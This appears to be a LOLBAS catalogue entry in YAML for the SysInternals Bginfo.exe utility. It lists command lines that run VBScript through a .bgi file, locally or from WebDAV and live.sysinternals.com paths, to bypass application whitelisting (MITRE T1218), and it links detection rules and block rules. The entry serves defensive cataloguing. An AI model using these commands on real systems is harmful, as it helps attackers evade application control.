--- Name: Bginfo.exe Description: Background Information Utility included with SysInternals Suite Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: bginfo.exe bginfo.bgi /popup /nolicprompt Description: Execute VBscript code that is referenced within the bginfo.bgi file. Usecase: Local execution of VBScript Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH - Command: bginfo.exe bginfo.bgi /popup /nolicprompt Description: Execute VBscript code that is referenced within the bginfo.bgi file. Usecase: Local execution of VBScript Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH - Command: \\\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: Execute Privileges: User MitreID: T1218 Tags: - Execute: WSH OperatingSystem: Windows - Command: \\\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH - Command: \\live.sysinternals.com\Tools\bginfo.exe \\\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH - Command: \\live.sysinternals.com\Tools\bginfo.exe \\\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: WSH Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe'